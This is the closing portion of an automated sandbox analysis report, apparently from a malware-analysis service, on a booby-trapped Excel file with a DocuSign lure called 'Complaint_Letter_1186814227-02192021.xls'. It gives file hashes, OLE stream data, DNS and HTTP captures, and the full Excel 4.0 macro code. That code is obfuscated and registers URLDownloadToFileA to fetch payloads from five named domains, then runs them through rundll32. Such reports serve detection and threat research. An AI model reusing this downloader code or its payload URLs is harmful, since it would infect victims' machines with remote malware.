                  Preview: L..................F.... ........{..S0.OB...4..OB................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..<..XR.. .COMPLA~1.XLS..~.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t._.L.e.t.t.e.r._.1.1.8.6.8.1.4.2.2.7.-.0.2.1.9.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\Complaint_Letter_1186814227-02192021.xls.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t._.L.e.t.t.e.r._.1.1.8.6.8.1.4.2.2.7.-.0.2.1.9.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 23:16:35 2021, atime=Tue Feb 23 23:16:35 2021, length=8192, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.471316211640594
                  Encrypted:false
                  SSDEEP:12:85Q/LgXg/XAlCPCHaXgzB8IB/KvX+Wnicvb3bDtZ3YilMMEpxRljKY6TdJP9TdJ2:85Y/XTwz6IUYePDv3qqrNru/
                  MD5:42F307AF27A8A903CCC2C5C41E83E32E
                  SHA1:EE47888CB4A856FFB7A345586B0B4BA95B19CEB3
                  SHA-256:D253E1CF9C70496A21366E41616941E72C261D1A5A6DC0F3C2BD76205029C4BA
                  SHA-512:9F15635FC6426C4DE0D3BB044E386C7B9D0AA366E9B1C923531C1DFA3E52589A9D007DD8EC12C5326A9EF4E5ADEA7406CE7E2BF83405FB384671DF75C10C052D
                  Malicious:false
                  Preview: L..................F...........7G..S0.OB...S0.OB.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):161
                  Entropy (8bit):4.798894274434397
                  Encrypted:false
                  SSDEEP:3:oyBVomMYl6p0mcTWbt9Sp6l+1l6p0mcTWbt9Sp6lmMYl6p0mcTWbt9Sp6lv:dj6YlccTcXralccTcXrxYlccTcXr1
                  MD5:CADBB04F8298E7962F40328079687B72
                  SHA1:1927A0BC186777DBAAD977E3B7B593EC5D6E5E1B
                  SHA-256:6E08D3312DED62A53033BCCD48D8CB0AF4E52655C2BBEB7151FB690E4CBB7AC4
                  SHA-512:F12057FFE94CFD805C5E0708AF8B066FE93EBB160895C6DD10FCDA4BD8F9AD5FABCA081C94EFCC0DDBC11B0A92F0047C7D41EB7C1A84CAB36A8D634193D51BCC
                  Malicious:false
                  Preview: Desktop.LNK=0..[xls]..Complaint_Letter_1186814227-02192021.LNK=0..Complaint_Letter_1186814227-02192021.LNK=0..[xls]..Complaint_Letter_1186814227-02192021.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\05Q27A4H.txt
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):83
                  Entropy (8bit):4.478685859616817
                  Encrypted:false
                  SSDEEP:3:zWRE2W26tLdfUQ2mFVZO3+KclKfSV3P:zWiYZXqY+KcxV3P
                  MD5:2A642149F8BD635781257176BA2E325B
                  SHA1:5554445EC5FE013AC58896889A6760E8EF0BF308
                  SHA-256:5FFB74F81110B9FF00701A1EC7214F1350B398C0ED4CFE01BCCA217038A2E6C4
                  SHA-512:5F53E3E2AD66DD3A3525E697FDD92F6880BAF2C919E8D63721995884788006FBC803A0A09EE5ED6621F2F12F58122DE3252FC880334DDA575451847CE5A8E0E8
                  Malicious:false
                  IE Cache URL:sportsmarquee.com/
                  Preview: cxssh_status.off.sportsmarquee.com/.1536.2095582592.30890123.1699116689.30870082.*.
                  C:\Users\user\Desktop\72CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):88554
                  Entropy (8bit):6.543076863136895
                  Encrypted:false
                  SSDEEP:1536:iZ8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdg5fHCI3sEBE/BveFCD3sEBE/Bvezt:iZ8rmjAItyzElBIL6lECbgBGGP5xLm7H
                  MD5:941E03F0B024ED1BCEE4AD91B34DCFAD
                  SHA1:4A6F5E727506E271AF0AB4F5563CC22169D22727
                  SHA-256:9CB707CE9126B0275D98060383F0128F886557ACDBD53A4CB4883312C552F8F9
                  SHA-512:8775C57CEB3BEE2DF65B3BE9CC9EE79A7BEDCFC6C1F1108E1DBECEA7C8DDEA0A31F01D975C6EDB9AB2EE06AB3A5CB408F85F9B9411DB25D25BE03AFA8141AF34
                  Malicious:false
                  Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<.....

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 09:43:01 2021, Security: 0
                  Entropy (8bit):3.6960536280224883
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:Complaint_Letter_1186814227-02192021.xls
                  File size:146432
                  MD5:888909141f8ad83f4509703b1bae7187
                  SHA1:dab7c94aff5dbeabebf9d85c6b2e7f6e6ba98e18
                  SHA256:f11a1405772bbb1aa0d1e55fc2faa77fe8a5541894e9617fbd8e6430c9e38731
                  SHA512:afd1c1867c093444d9fda969093d2a09e23f279bfbafd6b5a802b14e01ab69467de11bd24484001f8f6baa094486a77f4eb69b1da1159c1f9cd9ac53a043ecf2
                  SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMht/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/i:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMP
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Complaint_Letter_1186814227-02192021.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:Friner
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-19 09:43:01
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.321292606979
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.272902601407
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135192
                  General
                  Stream Path:Book
                  File Type:Applesoft BASIC program data, first line number 8
                  Stream Size:135192
                  Entropy:3.69021498015
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                  Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""HVFHGHFHDHGFHGDFGBJHDuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""KJNFSJGBRYVBYGVRYWGBRBRBownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",parama-college.id/yxpmmmg/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",raivens.com/zdmqwymhhza/,,"=RIGHT(""SDFJKTRESDCVBNMFDTHEWTTHDSTJndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",sportsmarquee.com/hmffuzbolyio/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",erp.demosoftware.biz/focahjqevd/,,"=RIGHT(""NBNDBFEVBVRESVGHRVGHVRFVGHRTRUHGR..\KLSD.ggsso"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",jayshreewoods.com/gvazzbwlvyk/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
                  "=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))""=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))"=HALT()

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 23, 2021 16:16:19.808659077 CET4916580192.168.2.22203.142.76.236
                  Feb 23, 2021 16:16:20.068115950 CET8049165203.142.76.236192.168.2.22
                  Feb 23, 2021 16:16:20.068427086 CET4916580192.168.2.22203.142.76.236
                  Feb 23, 2021 16:16:20.069920063 CET4916580192.168.2.22203.142.76.236
                  Feb 23, 2021 16:16:20.326196909 CET8049165203.142.76.236192.168.2.22
                  Feb 23, 2021 16:16:20.853996038 CET8049165203.142.76.236192.168.2.22
                  Feb 23, 2021 16:16:20.854298115 CET4916580192.168.2.22203.142.76.236
                  Feb 23, 2021 16:16:20.858316898 CET8049165203.142.76.236192.168.2.22
                  Feb 23, 2021 16:16:20.858437061 CET4916580192.168.2.22203.142.76.236
                  Feb 23, 2021 16:16:20.944479942 CET4916680192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.121695995 CET8049166159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.121815920 CET4916680192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.123222113 CET4916680192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.301657915 CET8049166159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.301707029 CET8049166159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.301872015 CET4916680192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.319463968 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.494048119 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.494425058 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.511601925 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.686116934 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.687419891 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.687463999 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.687488079 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.687757015 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.703984976 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:21.878635883 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:21.878973007 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:23.411834955 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:23.594985008 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:23.595171928 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:23.596002102 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:23.769654036 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:23.772114992 CET44349167159.89.174.35192.168.2.22
                  Feb 23, 2021 16:16:23.772226095 CET49167443192.168.2.22159.89.174.35
                  Feb 23, 2021 16:16:23.906764984 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:23.906908989 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:23.907906055 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:24.045454025 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:25.858752012 CET8049165203.142.76.236192.168.2.22
                  Feb 23, 2021 16:16:25.859108925 CET4916580192.168.2.22203.142.76.236
                  Feb 23, 2021 16:16:55.632601976 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632658005 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632699966 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632740974 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632775068 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.632821083 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.632838964 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632859945 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.632906914 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632926941 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.632967949 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.632987976 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.633044958 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.633333921 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.633366108 CET804917070.32.104.19192.168.2.22
                  Feb 23, 2021 16:16:55.633418083 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.633460999 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.641071081 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.641134024 CET4917080192.168.2.2270.32.104.19
                  Feb 23, 2021 16:16:55.735174894 CET4917180192.168.2.2258.96.102.67
                  Feb 23, 2021 16:16:55.859656096 CET8049165203.142.76.236192.168.2.22
                  Feb 23, 2021 16:16:56.082077026 CET804917158.96.102.67192.168.2.22
                  Feb 23, 2021 16:16:56.082218885 CET4917180192.168.2.2258.96.102.67
                  Feb 23, 2021 16:16:56.083353043 CET4917180192.168.2.2258.96.102.67
                  Feb 23, 2021 16:16:56.430135965 CET804917158.96.102.67192.168.2.22
                  Feb 23, 2021 16:16:56.460094929 CET804917158.96.102.67192.168.2.22
                  Feb 23, 2021 16:16:56.460336924 CET4917180192.168.2.2258.96.102.67
                  Feb 23, 2021 16:16:56.461956024 CET804917158.96.102.67192.168.2.22
                  Feb 23, 2021 16:16:56.462145090 CET4917180192.168.2.2258.96.102.67
                  Feb 23, 2021 16:16:56.542912960 CET4917280192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:56.696842909 CET804917213.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:56.696974993 CET4917280192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:56.698048115 CET4917280192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:56.851855040 CET804917213.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.543236017 CET804917213.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.543289900 CET804917213.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.543473005 CET4917280192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.548544884 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.702228069 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.702377081 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.703718901 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.857239008 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.857697964 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.857752085 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.857793093 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.857822895 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.857855082 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.857903957 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.857911110 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.860292912 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.860344887 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:16:59.860416889 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.860480070 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:16:59.876363039 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:17:00.030158043 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:17:00.030389071 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:17:00.076894999 CET49173443192.168.2.2213.126.100.34
                  Feb 23, 2021 16:17:00.270075083 CET4434917313.126.100.34192.168.2.22
                  Feb 23, 2021 16:17:01.463128090 CET804917158.96.102.67192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 23, 2021 16:16:19.624469042 CET5219753192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:19.786175013 CET53521978.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:20.877873898 CET5309953192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:20.940587997 CET53530998.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:22.224231958 CET5283853192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:22.273478985 CET53528388.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:22.286020041 CET6120053192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:22.337598085 CET53612008.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:22.864650965 CET4954853192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:22.924740076 CET53495488.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:22.934739113 CET5562753192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:22.983563900 CET53556278.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:23.617435932 CET5600953192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:23.765706062 CET53560098.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:55.666337967 CET6186553192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:55.731496096 CET53618658.8.8.8192.168.2.22
                  Feb 23, 2021 16:16:56.479896069 CET5517153192.168.2.228.8.8.8
                  Feb 23, 2021 16:16:56.539371967 CET53551718.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Feb 23, 2021 16:16:19.624469042 CET192.168.2.228.8.8.80x78b6Standard query (0)parama-college.idA (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:20.877873898 CET192.168.2.228.8.8.80x46f6Standard query (0)raivens.comA (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:23.617435932 CET192.168.2.228.8.8.80x1beStandard query (0)sportsmarquee.comA (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:55.666337967 CET192.168.2.228.8.8.80x7c3eStandard query (0)erp.demosoftware.bizA (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:56.479896069 CET192.168.2.228.8.8.80x8464Standard query (0)jayshreewoods.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Feb 23, 2021 16:16:19.786175013 CET8.8.8.8192.168.2.220x78b6No error (0)parama-college.id203.142.76.236A (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:20.940587997 CET8.8.8.8192.168.2.220x46f6No error (0)raivens.com159.89.174.35A (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:23.765706062 CET8.8.8.8192.168.2.220x1beNo error (0)sportsmarquee.com70.32.104.19A (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:55.731496096 CET8.8.8.8192.168.2.220x7c3eNo error (0)erp.demosoftware.biz58.96.102.67A (IP address)IN (0x0001)
                  Feb 23, 2021 16:16:56.539371967 CET8.8.8.8192.168.2.220x8464No error (0)jayshreewoods.com13.126.100.34A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • parama-college.id
                  • raivens.com
                  • sportsmarquee.com
                  • erp.demosoftware.biz
                  • jayshreewoods.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165203.142.76.23680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Feb 23, 2021 16:16:20.069920063 CET0OUTGET /yxpmmmg/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: parama-college.id
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:20.853996038 CET1INHTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 15:16:20 GMT
